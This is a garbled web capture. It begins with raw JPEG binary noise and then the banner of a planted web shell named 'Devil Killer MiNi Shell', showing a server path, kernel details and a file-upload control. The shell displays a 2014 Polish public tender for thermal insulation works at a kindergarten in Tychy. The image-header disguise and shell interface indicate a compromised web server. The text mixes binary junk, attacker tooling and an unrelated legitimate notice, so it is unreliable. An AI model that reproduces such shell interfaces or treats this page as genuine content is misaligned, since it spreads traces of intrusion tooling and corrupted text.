JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140327/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140327/104784-N-2014.html

<p class="kh_header"><b>Tychy: OPRACOWANIE  DOKUMENTACJI  PROJEKTOWEJ WRAZ Z WYKONANIEM    
     ZAPROJEKTOWANYCH ROBÓT DLA ZADANIA INWESTYCYJNEGO PN.:
    TERMOMODERNIZACJA CZĘŚCI NIERUCHOMOŚCI STANOWIĄCEJ WŁASNOŚĆ  
    GMINY, PRZY ULICY FILARETÓW 5</b><br>
<b>Numer ogłoszenia: 104784 - 2014; data zamieszczenia: 27.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.umtychy.pl/jednostki-organizacyjne-miasta/35</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE  DOKUMENTACJI  PROJEKTOWEJ WRAZ Z WYKONANIEM    
     ZAPROJEKTOWANYCH ROBÓT DLA ZADANIA INWESTYCYJNEGO PN.:
    TERMOMODERNIZACJA CZĘŚCI NIERUCHOMOŚCI STANOWIĄCEJ WŁASNOŚĆ  
    GMINY, PRZY ULICY FILARETÓW 5.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest opracowanie dokumentacji projektowej wraz z wykonaniem
     zaprojektowanych robót budowlanych w zakresie ocieplenia ścian zewnętrznych 
     (podłużnej i szczytowej) budynku Przedszkola Bajeczka , przy ulicy Filaretów 5 w Tychach, 
     w ramach zadania inwestycyjnego pn.: Termomodernizacja części nieruchomości 
     stanowiącej własność gminy, przy ul. Filaretów 5 -  zgodnie z programem funkcjonalno 
     -  użytkowym stanowiącym załącznik nr 1 do wzoru umowy.



2.	ZAKRES ZAMÓWIENIA OBEJMUJE: 
  1)  Opracowanie dokumentacji projektowej w zakresie ocieplenia ścian zewnętrznych 
       (podłużnej i szczytowej) budynku użyteczności publicznej - PRZEDSZKOLA  Bajeczka  
        w Tychach przy ul. Filaretów  5.
        Zakres dokumentacji projektowej obejmuje między innymi:
       -    opracowanie dokumentacji projektowej ocieplenia ścian zewnętrznych wraz z 
             uzgodnieniem kolorystyki elewacji. 
       -    uzyskanie zgody na realizację robót budowlanych w Wydziale Budownictwa Urzędu 
             Miasta Tychy na realizację robót budowlanych.
       Zakres prac projektowych, który należy uwzględnić przy opracowaniu dokumentacji  
       projektowej został podany w rozdziale III pkt 2 programu funkcjonalno- użytkowego 
       (wykonanie zaprojektowanych robót). 
       Opracowanie należy wykonać w 5 egzemplarzach + płyta CD (wersja elektroniczna        
       w formacie pdf  (wraz z opisem dysku). 
       Materiały wskazane w projekcie winny posiadać deklaracje zgodności z Polską Normą lub
       Europejską Aprobatą Techniczną,

         2)  Wykonanie zaprojektowanych robót budowlanych:
       Zakres robót budowlanych obejmuje:
a)	 Roboty przygotowawcze:
        -   zmycie elewacji                        
        -   skucie głuchych tynków, uzupełnienie ubytków tynku
        -   częściowe rozebranie żelbetowych  schodów  zewnętrznych wraz z podestem- wejście 
             na zaplecze
        -   demontaż parapetów, rur spustowych, obróbek blacharskich, daszków i innych 
             elementów zamocowanych do elewacji
b)	 Roboty dociepleniowe ścian zewnętrznych (podłużnej i szczytowej):	
         -   naprawa żelbetowych schodów  zewnętrznych wraz z podestem i balustradą stalową 
              wys. minimum 1,10 m- wejście na zaplecze
         -   demontaż i montaż okienka piwnicznego
         -   ocieplenie ścian zewnętrznych wg technologii BSO (należy uwzględnić  zwiększenie 
              nakładów materiałowych ze względu na krzywiznę ścian), do  wysokości 2,50 m  
              podwójna siatka
         -   ocieplenie ościeży z wykonaniem ram okiennych o szer. 8 cm gr. 2 cm, górna krawędź 
              ościeży - listwa okapnikowa
         -   ocieplenie gzymsu dachowego
         -   ocieplenie cokołu - tynk mozaikowy, 
         -   osadzenie nowych parapetów i obróbek blacharskich z blachy powlekanej
         -   wykończenie: krawędzi - kątownik z siatką, początek ocieplenia - listwa startowa.
              Ponowny montaż elementów elewacji (rury spustowe, instalacja odgromowa, itp.)
         -   wywóz i utylizacja materiałów z rozbiórki
         -   wymiana witryny z drzwiami głównymi wejściowymi (stalowe, oszklone, ocynkowane-
              malowane proszkowo w systemie OPEUS) - wymiary całkowite 2,90 x2,50 m
              Wykonanie nowej ściany  zewnętrznej osłonowej przy witrynie wejściowej - wiatrołap  
              wymiary: 2,70 x 2,50 m
         -   wykonanie wszystkich niezbędnych prac, które towarzyszą niniejszemu zamówieniu, 
              tj.: ustawienie rusztowań przy ścianach, ułożenie chodników po przebudowie wpustów 
              kanalizacji deszczowej itp..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.44.30.00-4, 45.26.21.20-8, 45.32.00.00-6, 45.32.10.00-3, 45.41.00.00-4, 45.26.13.20-3, 71.22.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości:  
1 900,00 zł   (słownie: jeden tysiąc dziewięćset złotych).
2.	Wadium musi być wniesione przed upływem terminu składania ofert.
3.	Przy wnoszeniu wadium Wykonawca winien powołać się na nazwę przetargu.
4.	Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	pieniądzu:
wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego:
Bank PKO S.A.  o / Tychy
Nr rachunku bankowego: 71 1020 2528 0000 0202 0267 3846
Wadium wniesione w formie pieniężnej musi znajdować się na koncie Zamawiającego przed upływem terminu składania ofert.
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,                    
d)	gwarancjach ubezpieczeniowych, 
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dn. 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275 , z późn. zm.).
5.	W przypadku wadium wniesionego w formie innej niż pieniężna - oryginał dowodu wniesienia   wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego, w Tychach przy ul. Filaretów 31 w Dziale Księgowości (pokój nr 4), natomiast kopię dowodu wniesienia wadium należy załączyć do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Zamawiający nie precyzuje w tym zakresie sposobu oceny spełniania warunku udziału 
    w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że  wykonawca spełnia warunek udziału dotyczący posiadania wiedzy i doświadczenia (art. 22 ust.1 pkt 2 ustawy - PZP), Zamawiający wymaga złożenia następujących dokumentów: 
  1)  wykazu robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem 
       terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym 
       okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz 
       załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te 
       zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
       Zamawiający uzna  warunek za spełniony, jeżeli wykonawca wykaże ,że wykonał 
       zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył:
a)   co najmniej jedną robotę budowlaną obejmującą swym zakresem opracowanie 
       dokumentacji projektowej wraz ze zrealizowaniem zaprojektowanych robót budowlanych 
       w zakresie wykonania ocieplenia ścian zewnętrznych w technologii lekkiej-mokrej, 
       w zaproponowanym w ofercie systemie ociepleniowym (robota winna dotyczyć realizacji 
       jednego zamówienia i być przedmiotem jednej umowy), o wartości nie mniejszej niż 
       79 500,00 zł (brutto)
    lub 

 b) co najmniej dwie roboty budowlane obejmujące swym zakresem opracowanie 
     dokumentacji projektowej wraz ze zrealizowaniem zaprojektowanych robót budowlanych 
     w zakresie wykonania ocieplenia ścian zewnętrznych w technologii lekkiej-mokrej, 
     w zaproponowanym w ofercie systemie ciepleniowym (każda z robót winna dotyczyć 
     realizacji jednego zamówienia i być przedmiotem jednej umowy o wartości nie mniejszej niż 
     39 750,00 zł  (brutto) - każda z robót
w zamieszkałych budynkach lub  w funkcjonujących budynkach użyteczności  
     publicznej  /dot. pkt 1) a i b /


2)  Do wykazu należy dołączyć dowody dotyczące najważniejszych robót, określające, 
      czy roboty te zostały wykonane w sposób należyty oraz wskazujące, czy zostały 
      wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
          Dowodami o których mowa powyżej są:
 a)  poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych 
      lub ciągłych poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed 
 upływem terminu składania ofert
 b)  w przypadku zamówień na roboty budowlane - inne dokumenty - jeżeli z uzasadnionych 
      przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać 
      poświadczenia, o którym mowa w pkt 2a)
 c)  w przypadku zamówień na dostawy lub usługi - oświadczenie wykonawcy- jeżeli z
uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać 
poświadczenia, o którym mowa w pkt 2a)
      Wykaz należy sporządzić wg wzoru druku stanowiącego  załącznik nr 3 do SIWZ.
     (W przypadku podmiotów występujących wspólnie warunek ten wykonawcy mogą spełniać
      łącznie  lub co najmniej jeden z wykonawców).        
    
1.2.1   W przypadku, gdy Zamawiający jest podmiotem , na rzecz którego roboty wskazane w 
     wykazie zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania        
     dowodów, o których mowa w pk 2).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Zamawiający nie precyzuje w tym zakresie sposobu oceny spełniania warunku udziału 
    w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że wykonawca spełnia warunek udziału dotyczący dysponowania osobami zdolnymi do wykonania zamówienia (art. 22 ust. 1 pkt 3 ustawy - PZP) 
Zamawiający wymaga złożenia następujących dokumentów:
1)  wykazu osób , które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia 
     i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych 
     przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.
     Wymagane jest dysponowanie osobą /osobami zdolnymi do wykonania zamówienia,   
     w szczególności:
a)  co najmniej jedną osobą posiadającą odpowiednie uprawnienia budowlane do       
     projektowania 
b)  co najmniej jedną osobą posiadającą uprawnienia budowlane w specjalności 
     konstrukcyjno - budowlanej (do kierowania robotami), w zakresie pełnienia funkcji 
     kierownika robót,
c)	co najmniej trzema osobami przeszkolonymi w zakresie technologii wykonywania 
     systemu ociepleniowego ścian zewnętrznych - systemu zaproponowanego przez 
     wykonawcę w ofercie, 
    (W przypadku podmiotów występujących wspólnie warunek ten wykonawcy mogą spełniać 
     łącznie lub co najmniej jeden z wykonawców). 
     Wykaz osób należy sporządzić wg wzoru druku stanowiącego załącznik nr 4 do SIWZ.


2)	 oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają 
     wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
     Oświadczenie należy sporządzić wg wzoru stanowiącego załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia , że  wykonawca spełnia warunek udziału dotyczący posiadania
     wymaganej sytuacji ekonomicznej i finansowej (art. 22 ust. 1 pkt  4 ustawy - PZP), 
     zamawiający wymaga, złożenia następujących dokumentów: 
 1) opłaconej polisy, a w przypadku jej braku,  innego dokumentu potwierdzającego, że 
      wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
      działalności związanej z przedmiotem zamówienia. Wymagane jest posiadanie ww.  
      dokumentu o wartości ubezpieczenia nie mniejszej niż  79 500,00 zł.
   
     Do oferty należy dołączyć potwierdzenie opłacenia polisy l u b  fakt  jej opłacenia 
     musi wynikać z treści dokumentu.
     Jeżeli fakt opłacenia polisy lub innego dokumentu potwierdzającego, że wykonawca jest 
     ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej
     z przedmiotem zamówienia, nie wynika wprost z załączonego do oferty dokumentu 
     wykonawca jest zobowiązany dołączyć inny dokument potwierdzający opłacenie składki 
     (np. kopia przelewu składki, potwierdzenie ubezpieczyciela).
                           (W przypadku podmiotów występujących wspólnie niniejszy warunek udziału wykonawcy mogą spełniać  łącznie lub co najmniej jeden z wykonawców).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony i podpisany formularz ofertowy - sporządzony według wzoru druku stanowiącego załącznik nr 1 do SIWZ.
2)	wypełniony i podpisany formularz oferty cenowej  - sporządzony według wzoru druku stanowiącego załącznik nr 1a do SIWZ.
3)	stosowne pełnomocnictwo (a) do działania w imieniu wykonawcy w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru.

4)	w przypadku wykonawców wspólnie ubiegających się się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego
5)	dowód wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
1)	zmian personalnych, adresowych, formy prawnej stron umowy;
2)	zmiany osoby/osób odpowiedzialnych  za realizację robót, o których mowa w § 4 umowy;
3)	zmiany przepisów Ustawy o podatku od towarów i usług w zakresie wysokości stawki VAT; 
4)	zmiany terminu realizacji przedmiotu umowy, w następstwie:
    a)  zmian będących następstwem działań organów administracji, (np.opóźnienia w uzyskaniu 
         uzgodnień, decyzji administracyjnych dotyczących przedmiotu umowy);
    b)  zmian będących następstwem okoliczności leżących po stronie Zamawiającego i nie 
         wynikających z winy Wykonawcy (np. wstrzymanie terminu realizacji przedmiotu umowy);    
    c)  w sytuacji udokumentowanego wystąpienia niesprzyjających warunków atmosferycznych 
         (tj. opady deszczu, śniegu, niskie temperatury) uniemożliwiających wykonywanie robót na 
         zewnątrz budynku - zgodnie z technologią i sztuką budowlaną, pod warunkiem 
         terminowego, zgodnego z umową terminu rozpoczęcia robót,   



    d)  wystąpienia zamówień dodatkowych nie objętych zamówieniem podstawowym, których   
         wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia, 
         jeżeli:
         -  z przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego od
            zamówienia podstawowego wymagałoby poniesienia niewspółmiernie wysokich kosztów
        lub 
         -  wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia 
                 dodatkowego, 
     e) wykonania robót zamiennych;
5)   zmiany podwykonawcy robót w trakcie trwania umowy - za zgodą Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umtychy.pl/jednostki-organizacyjne-miasta/35<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Budynków Mieszkalnych w Tychach,
Dział Techniczno-Eksploatacyjny , 43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.04.2014 godzina 09:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
SEKRETARIAT -  pokój nr 15,  43-100 Tychy, ul. Filaretów 31.</p>
